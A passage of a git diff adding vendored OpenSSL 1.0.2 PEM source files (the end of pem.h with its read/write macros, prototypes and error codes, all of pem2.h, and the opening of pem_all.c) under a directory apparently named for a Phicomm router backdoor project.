+# define PEM_TYPE_MIC_ONLY       20
+# define PEM_TYPE_MIC_CLEAR      30
+# define PEM_TYPE_CLEAR          40
+
+typedef struct pem_recip_st {
+    char *name;
+    X509_NAME *dn;
+    int cipher;
+    int key_enc;
+    /*      char iv[8]; unused and wrong size */
+} PEM_USER;
+
+typedef struct pem_ctx_st {
+    int type;                   /* what type of object */
+    struct {
+        int version;
+        int mode;
+    } proc_type;
+
+    char *domain;
+
+    struct {
+        int cipher;
+        /*-
+        unused, and wrong size
+        unsigned char iv[8]; */
+    } DEK_info;
+
+    PEM_USER *originator;
+
+    int num_recipient;
+    PEM_USER **recipient;
+/*-
+    XXX(ben): don#t think this is used!
+        STACK *x509_chain;      / * certificate chain */
+    EVP_MD *md;                 /* signature type */
+
+    int md_enc;                 /* is the md encrypted or not? */
+    int md_len;                 /* length of md_data */
+    char *md_data;              /* message digest, could be pkey encrypted */
+
+    EVP_CIPHER *dec;            /* date encryption cipher */
+    int key_len;                /* key length */
+    unsigned char *key;         /* key */
+  /*-
+    unused, and wrong size
+    unsigned char iv[8]; */
+
+    int data_enc;               /* is the data encrypted */
+    int data_len;
+    unsigned char *data;
+} PEM_CTX;
+
+/*
+ * These macros make the PEM_read/PEM_write functions easier to maintain and
+ * write. Now they are all implemented with either: IMPLEMENT_PEM_rw(...) or
+ * IMPLEMENT_PEM_rw_cb(...)
+ */
+
+# ifdef OPENSSL_NO_FP_API
+
+#  define IMPLEMENT_PEM_read_fp(name, type, str, asn1) /**/
+#  define IMPLEMENT_PEM_write_fp(name, type, str, asn1) /**/
+#  define IMPLEMENT_PEM_write_fp_const(name, type, str, asn1) /**/
+#  define IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1) /**/
+#  define IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1) /**/
+# else
+
+#  define IMPLEMENT_PEM_read_fp(name, type, str, asn1) \
+type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u)\
+{ \
+return PEM_ASN1_read((d2i_of_void *)d2i_##asn1, str,fp,(void **)x,cb,u); \
+}
+
+#  define IMPLEMENT_PEM_write_fp(name, type, str, asn1) \
+int PEM_write_##name(FILE *fp, type *x) \
+{ \
+return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,NULL,NULL,0,NULL,NULL); \
+}
+
+#  define IMPLEMENT_PEM_write_fp_const(name, type, str, asn1) \
+int PEM_write_##name(FILE *fp, const type *x) \
+{ \
+return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,(void *)x,NULL,NULL,0,NULL,NULL); \
+}
+
+#  define IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1) \
+int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, \
+                  void *u) \
+        { \
+        return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
+        }
+
+#  define IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1) \
+int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, \
+                  void *u) \
+        { \
+        return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
+        }
+
+# endif
+
+# define IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
+type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u)\
+{ \
+return PEM_ASN1_read_bio((d2i_of_void *)d2i_##asn1, str,bp,(void **)x,cb,u); \
+}
+
+# define IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
+int PEM_write_bio_##name(BIO *bp, type *x) \
+{ \
+return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,NULL,NULL,0,NULL,NULL); \
+}
+
+# define IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
+int PEM_write_bio_##name(BIO *bp, const type *x) \
+{ \
+return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,NULL,NULL,0,NULL,NULL); \
+}
+
+# define IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
+int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
+        { \
+        return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,enc,kstr,klen,cb,u); \
+        }
+
+# define IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
+int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
+        { \
+        return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,enc,kstr,klen,cb,u); \
+        }
+
+# define IMPLEMENT_PEM_write(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_fp(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_write_const(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_fp_const(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_write_cb(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_write_cb_const(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_read(name, type, str, asn1) \
+        IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
+        IMPLEMENT_PEM_read_fp(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_rw(name, type, str, asn1) \
+        IMPLEMENT_PEM_read(name, type, str, asn1) \
+        IMPLEMENT_PEM_write(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_rw_const(name, type, str, asn1) \
+        IMPLEMENT_PEM_read(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_const(name, type, str, asn1)
+
+# define IMPLEMENT_PEM_rw_cb(name, type, str, asn1) \
+        IMPLEMENT_PEM_read(name, type, str, asn1) \
+        IMPLEMENT_PEM_write_cb(name, type, str, asn1)
+
+/* These are the same except they are for the declarations */
+
+# if defined(OPENSSL_NO_FP_API)
+
+#  define DECLARE_PEM_read_fp(name, type) /**/
+#  define DECLARE_PEM_write_fp(name, type) /**/
+#  define DECLARE_PEM_write_cb_fp(name, type) /**/
+# else
+
+#  define DECLARE_PEM_read_fp(name, type) \
+        type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u);
+
+#  define DECLARE_PEM_write_fp(name, type) \
+        int PEM_write_##name(FILE *fp, type *x);
+
+#  define DECLARE_PEM_write_fp_const(name, type) \
+        int PEM_write_##name(FILE *fp, const type *x);
+
+#  define DECLARE_PEM_write_cb_fp(name, type) \
+        int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
+
+# endif
+
+# ifndef OPENSSL_NO_BIO
+#  define DECLARE_PEM_read_bio(name, type) \
+        type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u);
+
+#  define DECLARE_PEM_write_bio(name, type) \
+        int PEM_write_bio_##name(BIO *bp, type *x);
+
+#  define DECLARE_PEM_write_bio_const(name, type) \
+        int PEM_write_bio_##name(BIO *bp, const type *x);
+
+#  define DECLARE_PEM_write_cb_bio(name, type) \
+        int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
+             unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
+
+# else
+
+#  define DECLARE_PEM_read_bio(name, type) /**/
+#  define DECLARE_PEM_write_bio(name, type) /**/
+#  define DECLARE_PEM_write_bio_const(name, type) /**/
+#  define DECLARE_PEM_write_cb_bio(name, type) /**/
+# endif
+# define DECLARE_PEM_write(name, type) \
+        DECLARE_PEM_write_bio(name, type) \
+        DECLARE_PEM_write_fp(name, type)
+# define DECLARE_PEM_write_const(name, type) \
+        DECLARE_PEM_write_bio_const(name, type) \
+        DECLARE_PEM_write_fp_const(name, type)
+# define DECLARE_PEM_write_cb(name, type) \
+        DECLARE_PEM_write_cb_bio(name, type) \
+        DECLARE_PEM_write_cb_fp(name, type)
+# define DECLARE_PEM_read(name, type) \
+        DECLARE_PEM_read_bio(name, type) \
+        DECLARE_PEM_read_fp(name, type)
+# define DECLARE_PEM_rw(name, type) \
+        DECLARE_PEM_read(name, type) \
+        DECLARE_PEM_write(name, type)
+# define DECLARE_PEM_rw_const(name, type) \
+        DECLARE_PEM_read(name, type) \
+        DECLARE_PEM_write_const(name, type)
+# define DECLARE_PEM_rw_cb(name, type) \
+        DECLARE_PEM_read(name, type) \
+        DECLARE_PEM_write_cb(name, type)
+# if 1
+/* "userdata": new with OpenSSL 0.9.4 */
+typedef int pem_password_cb (char *buf, int size, int rwflag, void *userdata);
+# else
+/* OpenSSL 0.9.3, 0.9.3a */
+typedef int pem_password_cb (char *buf, int size, int rwflag);
+# endif
+
+int PEM_get_EVP_CIPHER_INFO(char *header, EVP_CIPHER_INFO *cipher);
+int PEM_do_header(EVP_CIPHER_INFO *cipher, unsigned char *data, long *len,
+                  pem_password_cb *callback, void *u);
+
+# ifndef OPENSSL_NO_BIO
+int PEM_read_bio(BIO *bp, char **name, char **header,
+                 unsigned char **data, long *len);
+int PEM_write_bio(BIO *bp, const char *name, const char *hdr,
+                  const unsigned char *data, long len);
+int PEM_bytes_read_bio(unsigned char **pdata, long *plen, char **pnm,
+                       const char *name, BIO *bp, pem_password_cb *cb,
+                       void *u);
+void *PEM_ASN1_read_bio(d2i_of_void *d2i, const char *name, BIO *bp, void **x,
+                        pem_password_cb *cb, void *u);
+int PEM_ASN1_write_bio(i2d_of_void *i2d, const char *name, BIO *bp, void *x,
+                       const EVP_CIPHER *enc, unsigned char *kstr, int klen,
+                       pem_password_cb *cb, void *u);
+
+STACK_OF(X509_INFO) *PEM_X509_INFO_read_bio(BIO *bp, STACK_OF(X509_INFO) *sk,
+                                            pem_password_cb *cb, void *u);
+int PEM_X509_INFO_write_bio(BIO *bp, X509_INFO *xi, EVP_CIPHER *enc,
+                            unsigned char *kstr, int klen,
+                            pem_password_cb *cd, void *u);
+# endif
+
+int PEM_read(FILE *fp, char **name, char **header,
+             unsigned char **data, long *len);
+int PEM_write(FILE *fp, const char *name, const char *hdr,
+              const unsigned char *data, long len);
+void *PEM_ASN1_read(d2i_of_void *d2i, const char *name, FILE *fp, void **x,
+                    pem_password_cb *cb, void *u);
+int PEM_ASN1_write(i2d_of_void *i2d, const char *name, FILE *fp,
+                   void *x, const EVP_CIPHER *enc, unsigned char *kstr,
+                   int klen, pem_password_cb *callback, void *u);
+STACK_OF(X509_INFO) *PEM_X509_INFO_read(FILE *fp, STACK_OF(X509_INFO) *sk,
+                                        pem_password_cb *cb, void *u);
+
+int PEM_SealInit(PEM_ENCODE_SEAL_CTX *ctx, EVP_CIPHER *type,
+                 EVP_MD *md_type, unsigned char **ek, int *ekl,
+                 unsigned char *iv, EVP_PKEY **pubk, int npubk);
+void PEM_SealUpdate(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *out, int *outl,
+                    unsigned char *in, int inl);
+int PEM_SealFinal(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *sig, int *sigl,
+                  unsigned char *out, int *outl, EVP_PKEY *priv);
+
+void PEM_SignInit(EVP_MD_CTX *ctx, EVP_MD *type);
+void PEM_SignUpdate(EVP_MD_CTX *ctx, unsigned char *d, unsigned int cnt);
+int PEM_SignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
+                  unsigned int *siglen, EVP_PKEY *pkey);
+
+int PEM_def_callback(char *buf, int num, int w, void *key);
+void PEM_proc_type(char *buf, int type);
+void PEM_dek_info(char *buf, const char *type, int len, char *str);
+
+# include <openssl/symhacks.h>
+
+DECLARE_PEM_rw(X509, X509)
+DECLARE_PEM_rw(X509_AUX, X509)
+DECLARE_PEM_rw(X509_CERT_PAIR, X509_CERT_PAIR)
+DECLARE_PEM_rw(X509_REQ, X509_REQ)
+DECLARE_PEM_write(X509_REQ_NEW, X509_REQ)
+DECLARE_PEM_rw(X509_CRL, X509_CRL)
+DECLARE_PEM_rw(PKCS7, PKCS7)
+DECLARE_PEM_rw(NETSCAPE_CERT_SEQUENCE, NETSCAPE_CERT_SEQUENCE)
+DECLARE_PEM_rw(PKCS8, X509_SIG)
+DECLARE_PEM_rw(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO)
+# ifndef OPENSSL_NO_RSA
+DECLARE_PEM_rw_cb(RSAPrivateKey, RSA)
+DECLARE_PEM_rw_const(RSAPublicKey, RSA)
+DECLARE_PEM_rw(RSA_PUBKEY, RSA)
+# endif
+# ifndef OPENSSL_NO_DSA
+DECLARE_PEM_rw_cb(DSAPrivateKey, DSA)
+DECLARE_PEM_rw(DSA_PUBKEY, DSA)
+DECLARE_PEM_rw_const(DSAparams, DSA)
+# endif
+# ifndef OPENSSL_NO_EC
+DECLARE_PEM_rw_const(ECPKParameters, EC_GROUP)
+DECLARE_PEM_rw_cb(ECPrivateKey, EC_KEY)
+DECLARE_PEM_rw(EC_PUBKEY, EC_KEY)
+# endif
+# ifndef OPENSSL_NO_DH
+DECLARE_PEM_rw_const(DHparams, DH)
+DECLARE_PEM_write_const(DHxparams, DH)
+# endif
+DECLARE_PEM_rw_cb(PrivateKey, EVP_PKEY)
+DECLARE_PEM_rw(PUBKEY, EVP_PKEY)
+
+int PEM_write_bio_PKCS8PrivateKey_nid(BIO *bp, EVP_PKEY *x, int nid,
+                                      char *kstr, int klen,
+                                      pem_password_cb *cb, void *u);
+int PEM_write_bio_PKCS8PrivateKey(BIO *, EVP_PKEY *, const EVP_CIPHER *,
+                                  char *, int, pem_password_cb *, void *);
+int i2d_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                            char *kstr, int klen,
+                            pem_password_cb *cb, void *u);
+int i2d_PKCS8PrivateKey_nid_bio(BIO *bp, EVP_PKEY *x, int nid,
+                                char *kstr, int klen,
+                                pem_password_cb *cb, void *u);
+EVP_PKEY *d2i_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY **x, pem_password_cb *cb,
+                                  void *u);
+
+int i2d_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                           char *kstr, int klen,
+                           pem_password_cb *cb, void *u);
+int i2d_PKCS8PrivateKey_nid_fp(FILE *fp, EVP_PKEY *x, int nid,
+                               char *kstr, int klen,
+                               pem_password_cb *cb, void *u);
+int PEM_write_PKCS8PrivateKey_nid(FILE *fp, EVP_PKEY *x, int nid,
+                                  char *kstr, int klen,
+                                  pem_password_cb *cb, void *u);
+
+EVP_PKEY *d2i_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY **x, pem_password_cb *cb,
+                                 void *u);
+
+int PEM_write_PKCS8PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+                              char *kstr, int klen, pem_password_cb *cd,
+                              void *u);
+
+EVP_PKEY *PEM_read_bio_Parameters(BIO *bp, EVP_PKEY **x);
+int PEM_write_bio_Parameters(BIO *bp, EVP_PKEY *x);
+
+EVP_PKEY *b2i_PrivateKey(const unsigned char **in, long length);
+EVP_PKEY *b2i_PublicKey(const unsigned char **in, long length);
+EVP_PKEY *b2i_PrivateKey_bio(BIO *in);
+EVP_PKEY *b2i_PublicKey_bio(BIO *in);
+int i2b_PrivateKey_bio(BIO *out, EVP_PKEY *pk);
+int i2b_PublicKey_bio(BIO *out, EVP_PKEY *pk);
+# ifndef OPENSSL_NO_RC4
+EVP_PKEY *b2i_PVK_bio(BIO *in, pem_password_cb *cb, void *u);
+int i2b_PVK_bio(BIO *out, EVP_PKEY *pk, int enclevel,
+                pem_password_cb *cb, void *u);
+# endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_PEM_strings(void);
+
+/* Error codes for the PEM functions. */
+
+/* Function codes. */
+# define PEM_F_B2I_DSS                                    127
+# define PEM_F_B2I_PVK_BIO                                128
+# define PEM_F_B2I_RSA                                    129
+# define PEM_F_CHECK_BITLEN_DSA                           130
+# define PEM_F_CHECK_BITLEN_RSA                           131
+# define PEM_F_D2I_PKCS8PRIVATEKEY_BIO                    120
+# define PEM_F_D2I_PKCS8PRIVATEKEY_FP                     121
+# define PEM_F_DO_B2I                                     132
+# define PEM_F_DO_B2I_BIO                                 133
+# define PEM_F_DO_BLOB_HEADER                             134
+# define PEM_F_DO_PK8PKEY                                 126
+# define PEM_F_DO_PK8PKEY_FP                              125
+# define PEM_F_DO_PVK_BODY                                135
+# define PEM_F_DO_PVK_HEADER                              136
+# define PEM_F_I2B_PVK                                    137
+# define PEM_F_I2B_PVK_BIO                                138
+# define PEM_F_LOAD_IV                                    101
+# define PEM_F_PEM_ASN1_READ                              102
+# define PEM_F_PEM_ASN1_READ_BIO                          103
+# define PEM_F_PEM_ASN1_WRITE                             104
+# define PEM_F_PEM_ASN1_WRITE_BIO                         105
+# define PEM_F_PEM_DEF_CALLBACK                           100
+# define PEM_F_PEM_DO_HEADER                              106
+# define PEM_F_PEM_F_PEM_WRITE_PKCS8PRIVATEKEY            118
+# define PEM_F_PEM_GET_EVP_CIPHER_INFO                    107
+# define PEM_F_PEM_PK8PKEY                                119
+# define PEM_F_PEM_READ                                   108
+# define PEM_F_PEM_READ_BIO                               109
+# define PEM_F_PEM_READ_BIO_DHPARAMS                      141
+# define PEM_F_PEM_READ_BIO_PARAMETERS                    140
+# define PEM_F_PEM_READ_BIO_PRIVATEKEY                    123
+# define PEM_F_PEM_READ_DHPARAMS                          142
+# define PEM_F_PEM_READ_PRIVATEKEY                        124
+# define PEM_F_PEM_SEALFINAL                              110
+# define PEM_F_PEM_SEALINIT                               111
+# define PEM_F_PEM_SIGNFINAL                              112
+# define PEM_F_PEM_WRITE                                  113
+# define PEM_F_PEM_WRITE_BIO                              114
+# define PEM_F_PEM_WRITE_PRIVATEKEY                       139
+# define PEM_F_PEM_X509_INFO_READ                         115
+# define PEM_F_PEM_X509_INFO_READ_BIO                     116
+# define PEM_F_PEM_X509_INFO_WRITE_BIO                    117
+
+/* Reason codes. */
+# define PEM_R_BAD_BASE64_DECODE                          100
+# define PEM_R_BAD_DECRYPT                                101
+# define PEM_R_BAD_END_LINE                               102
+# define PEM_R_BAD_IV_CHARS                               103
+# define PEM_R_BAD_MAGIC_NUMBER                           116
+# define PEM_R_BAD_PASSWORD_READ                          104
+# define PEM_R_BAD_VERSION_NUMBER                         117
+# define PEM_R_BIO_WRITE_FAILURE                          118
+# define PEM_R_CIPHER_IS_NULL                             127
+# define PEM_R_ERROR_CONVERTING_PRIVATE_KEY               115
+# define PEM_R_EXPECTING_PRIVATE_KEY_BLOB                 119
+# define PEM_R_EXPECTING_PUBLIC_KEY_BLOB                  120
+# define PEM_R_INCONSISTENT_HEADER                        121
+# define PEM_R_KEYBLOB_HEADER_PARSE_ERROR                 122
+# define PEM_R_KEYBLOB_TOO_SHORT                          123
+# define PEM_R_NOT_DEK_INFO                               105
+# define PEM_R_NOT_ENCRYPTED                              106
+# define PEM_R_NOT_PROC_TYPE                              107
+# define PEM_R_NO_START_LINE                              108
+# define PEM_R_PROBLEMS_GETTING_PASSWORD                  109
+# define PEM_R_PUBLIC_KEY_NO_RSA                          110
+# define PEM_R_PVK_DATA_TOO_SHORT                         124
+# define PEM_R_PVK_TOO_SHORT                              125
+# define PEM_R_READ_KEY                                   111
+# define PEM_R_SHORT_HEADER                               112
+# define PEM_R_UNSUPPORTED_CIPHER                         113
+# define PEM_R_UNSUPPORTED_ENCRYPTION                     114
+# define PEM_R_UNSUPPORTED_KEY_COMPONENTS                 126
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem2.h
new file mode 100644
index 0000000..84897d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem2.h
@@ -0,0 +1,70 @@
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * This header only exists to break a circular dependency between pem and err
+ * Ben 30 Jan 1999.
+ */
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#ifndef HEADER_PEM_H
+void ERR_load_PEM_strings(void);
+#endif
+
+#ifdef __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.c
new file mode 100644
index 0000000..0e5be63
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_all.c
@@ -0,0 +1,427 @@
+/* crypto/pem/pem_all.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pkcs7.h>
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+#ifndef OPENSSL_NO_RSA
+static RSA *pkey_get_rsa(EVP_PKEY *key, RSA **rsa);
+#endif
+#ifndef OPENSSL_NO_DSA
